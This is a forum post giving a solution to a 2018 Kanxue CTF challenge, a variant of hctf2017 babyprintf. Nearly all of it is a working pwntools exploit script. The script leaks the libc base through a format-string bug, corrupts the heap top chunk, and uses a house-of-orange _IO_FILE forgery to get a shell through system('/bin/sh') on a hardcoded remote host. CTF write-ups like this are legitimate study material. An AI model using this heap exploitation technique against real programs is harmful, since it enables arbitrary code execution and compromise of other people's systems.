-
-
看雪CTF.TSRC 2018 团队赛-第14题
-
发表于:
2018-12-28 14:11
4850
-
原题是hctf2017 babyprintf, 只加了malloc次数限制, 论坛上也有人分析过
house of orange
from pwn import *
context.log_level = 'error'
context.arch = 'amd64'
def x_echo(io, buf, buf_len):
io.recvuntil('lens of your word: ')
io.sendline(str(buf_len))
io.recvuntil('word: ')
io.sendline(buf)
io.recvuntil('echo: ')
v = io.recvline(keepends=False)
return v
def test():
REMOTE = True
while True:
if REMOTE:
libc_path = 'libc.2.23.so'
io = remote('211.159.175.39', 8686)
else:
libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
io = process(['./echopwn'])
libc = ELF(libc_path)
io.recvuntil('echo from your heart\n')
buf_len = 0x20
buf = '%lx,%lx,%lx,%lx,%lx,%lx,%lx,%lx'.ljust(buf_len, '\x00')
# overwrite top chunk size
buf += p64(0) + p64(0x1000-0x10-buf_len+1)
v = x_echo(io, buf, buf_len)
v = v.split(',')[7]
libc_base = int(v, 16) - 0x20830
# print('libc_base: %s' % hex(libc_base))
if (libc_base & 0xFFFFFFFF) >= 0x80000000:
break
io.close()
# free old top chunk
x_echo(io, 'A', 0x1000)
libc_io_list_all = libc_base + libc.symbols['_IO_list_all']
libc_io_str_jumps = libc_base + libc.symbols['_IO_file_jumps'] + 0xC0
libc_system = libc_base + libc.symbols['system']
libc_bin_sh = libc_base + libc.search('/bin/sh\x00').next()
fp = ''
fp += p64(0) + p64(0x61)
fp += p64(0) + p64(libc_io_list_all - 0x10)
fp += p64(2) + p64(3)
fp += p64(0) + p64(libc_bin_sh)
fp = fp.ljust(0xc0, '\x00')
fp += p64(0)
fp += p64(0) * 2
fp += p64(libc_io_str_jumps - 8)
fp += p64(0)
fp += p64(libc_system)
buf = 'A' * 0x10 + fp
x_echo(io, buf, 0x10)
io.sendline("0")
io.interactive()
return
test()
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
